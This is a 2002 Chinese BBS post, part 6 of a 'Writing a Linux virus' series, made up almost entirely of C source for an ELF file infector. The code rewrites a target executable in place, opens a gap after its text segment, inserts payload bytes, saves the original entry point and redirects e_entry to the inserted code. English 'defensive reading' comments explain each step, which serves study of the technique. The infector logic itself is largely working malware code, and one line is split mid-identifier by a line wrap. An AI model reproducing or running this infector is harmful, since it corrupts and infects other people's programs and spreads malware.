发信人: jjk (UNIX+C+XML+?? 傻了?), 信区: Linux
标 题: 写一只Linux病毒(6) v0.c(转寄)[转载]
发信站: 荔园晨风BBS站 (Wed Apr 24 18:10:08 2002), 转信
【 以下文字转载自 jjk 的信箱 】
【 原文由 jjk.bbs@apue.dhs.org 所发表 】
发信人: lgx (lgx), 信区: CompSci
标 题: 写一只Linux病毒(6) v0.c
发信站: UNIX编程 (Mon Apr 22 17:08:30 2002) , 转信
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <elf.h>
#include "virus.h"
#include "virus.inc"
/*
 * Analysis notes (reviewer, defensive reading).
 *
 * Rewrites the 32-bit ELF file named by argv[1] in place: it opens a gap of
 * INFECTION_SIZE bytes at the file offset where the first loadable segment
 * ends, copies VLEN bytes of `virus` into that gap, and points e_entry at it.
 * `virus`, VLEN, INFECTION_SIZE and OLD_ENTRY are not defined in this listing;
 * presumably they come from virus.h / virus.inc -- confirm there.
 *
 * What a modified file looks like, as far as this code shows:
 *   - the file grows by INFECTION_SIZE bytes;
 *   - the PT_LOAD entry with p_offset == 0 has p_filesz and p_memsz enlarged
 *     by INFECTION_SIZE;
 *   - e_entry equals that segment's p_vaddr plus its previous p_memsz, i.e.
 *     the first byte past the segment's original memory image;
 *   - one e_ident byte is overwritten (see the "patch eh" step);
 *   - section header offsets are shifted, but no sh_size is changed here, so
 *     no section header describes the inserted bytes.
 *
 * The file is edited without a backup and in several separate writes; every
 * error path only closes the descriptor, so a failure part-way leaves the
 * target partially rewritten.
 *
 * Returns 0 on success, -1 on any failure (after perror()/puts()).
 * argv[1] is used without checking argc.
 */
int main(int argc,char **argv)
{
int fd,i;
char *file = argv[1];
/* Indices into ph[] of the chosen segments; -1 means "not found". */
int data = -1,text = -1;
struct stat st;
Elf32_Ehdr eh;
Elf32_Phdr *ph;
Elf32_Shdr *sh;
/* File offset one past the last byte of the text segment. */
unsigned long end_code;
char *buf;
size_t phlen,shlen,buflen;
/* Read/write access is needed because the target is modified in place. */
if ((fd = open(file,O_RDWR,0)) < 0) {
perror("open");
return -1;
}
/* st.st_size is used later to size the tail that has to be moved. */
if (fstat(fd,&st) < 0) {
perror("stat");
goto err;
}
// Read the ELF header from the start of the file.
if (read(fd,&eh,sizeof(eh)) != sizeof(eh)) {
perror("read");
goto err;
}
// Read the program header table (e_phnum entries at e_phoff).
if (lseek(fd,eh.e_phoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
/* The table size comes straight from the file's e_phnum; the copy lives on
 * the stack via alloca(). */
phlen = eh.e_phnum * sizeof(*ph);
ph = alloca(phlen);
if (read(fd,ph,phlen) != phlen) {
perror("read ph");
goto err;
}
// Pick the text and data segment indices.
/* Heuristic: a PT_LOAD entry with file offset 0 is taken as "text", any
 * PT_LOAD entry with a non-zero offset as "data" (the last match wins). */
for (i=0; i<eh.e_phnum; i++) {
if(ph[i].p_type == PT_LOAD) {
if (ph[i].p_offset)
data = i;
else
text = i;
}
}
// Sanity check: both segments must have been found.
if (data == -1 || text == -1) {
puts("Can't find text or data segmeng!");
goto err;
}
/* The text segment, grown by INFECTION_SIZE, must still end at or below the
 * data segment's virtual address.
 * NOTE(review): the condition below is split mid-identifier (p_ / vaddr) by
 * the BBS line wrap; it reads ph[data].p_vaddr. */
if ( ph[text].p_vaddr + ph[text].p_filesz + INFECTION_SIZE > ph[data].p_
vaddr) {
puts("No enough space");
goto err;
}
// Patch the in-memory program headers.
/* end_code is captured before p_filesz is enlarged, so it marks the original
 * end of the text segment in the file -- the insertion point. */
end_code = ph[text].p_offset + ph[text].p_filesz;
ph[text].p_filesz += INFECTION_SIZE;
ph[text].p_memsz += INFECTION_SIZE;
/* Every segment stored at or after the insertion point moves down the file
 * by INFECTION_SIZE. */
for (i=0; i<eh.e_phnum; i++) {
// printf("%d: %#x, %#x\n",i,ph[i].p_offset,end_code);
if (ph[i].p_offset >= end_code)
ph[i].p_offset += INFECTION_SIZE;
}
// Read the section header table (e_shnum entries at e_shoff).
if (lseek(fd,eh.e_shoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
shlen = eh.e_shnum * sizeof(*sh);
sh = alloca(shlen);
if (read(fd,sh,shlen) != shlen) {
perror("read sh");
goto err;
}
// Patch the in-memory section headers.
/* Only sh_offset is adjusted, and with a strict '>' (the program header loop
 * above uses '>='); sh_size and sh_addr are left untouched. */
for (i=0; i<eh.e_shnum; i++) {
if (sh[i].sh_offset > end_code)
sh[i].sh_offset += INFECTION_SIZE;
}
// Write the patched program headers back at their original offset.
if (lseek(fd,eh.e_phoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
if (write(fd,ph,phlen) != phlen) {
perror("write ph");
goto err;
}
// Write the patched section headers back.
/* eh.e_shoff is still the old offset at this point; if the table lies in the
 * tail, the move step below carries it to its new position. */
if (lseek(fd,eh.e_shoff,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
if (write(fd,sh,shlen) != shlen) {
perror("write sh");
goto err;
}
// Move the tail of the file to open the gap.
/* Everything from end_code to end of file is read into a stack buffer and
 * rewritten INFECTION_SIZE bytes further on. */
if (lseek(fd,end_code,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
buflen = st.st_size - end_code;
buf = alloca(buflen);
if (read(fd,buf,buflen) != buflen) {
perror("read buf");
goto err;
}
if (lseek(fd,end_code + INFECTION_SIZE,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
if (write(fd,buf,buflen) != buflen) {
perror("write buf");
goto err;
}
// Copy the payload bytes into the gap.
/* VLEN bytes are written; the gap is INFECTION_SIZE bytes. How the two sizes
 * relate is not visible here -- check virus.h. */
if (lseek(fd,end_code,SEEK_SET) < 0) {
perror("lseek virus");
goto err;
}
if (write(fd,virus,VLEN) != VLEN) {
perror("write virus");
goto err;
}
// Store the original entry point inside the inserted bytes.
/* Four bytes of the unmodified e_entry are written at offset OLD_ENTRY within
 * the inserted region; presumably the payload uses them to hand control back
 * to the host program -- confirm against the payload source. */
if (lseek(fd,end_code + OLD_ENTRY,SEEK_SET) < 0) {
perror("lseek virus");
goto err;
}
if (write(fd,&eh.e_entry,4) != 4) {
perror("write entry");
goto err;
}
// Patch the ELF header.
if (eh.e_shoff >= end_code)
eh.e_shoff += INFECTION_SIZE;
/* NOTE(review): EI_MAG10 / ELFMAG10 do not appear to be standard <elf.h>
 * names; presumably virus.h defines them. This overwrites one e_ident byte,
 * which looks like a marker for files already processed -- confirm. */
eh.e_ident[EI_MAG10] = ELFMAG10;
/* p_memsz was already enlarged above, so subtracting INFECTION_SIZE gives the
 * address just past the text segment's original memory image. */
eh.e_entry = ph[text].p_vaddr + ph[text].p_memsz - INFECTION_SIZE;
// Write the ELF header back at offset 0.
if (lseek(fd,0,SEEK_SET) < 0) {
perror("lseek");
goto err;
}
/* The failure message below says "write ph" although this is the ELF header
 * write. */
if (write(fd,&eh,sizeof(eh)) != sizeof(eh)) {
perror("write ph");
goto err;
}
close(fd);
return 0;
/* Common failure exit: nothing already written is rolled back. */
err:
close(fd);
return -1;
}
--
※ 来源:.UNIX编程WWW apue.dhs.org. [FROM: 202.108.200.52]
--
※ 转寄:·UNIX编程 apue.dhs.org·[FROM: 210.39.3.50]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.146]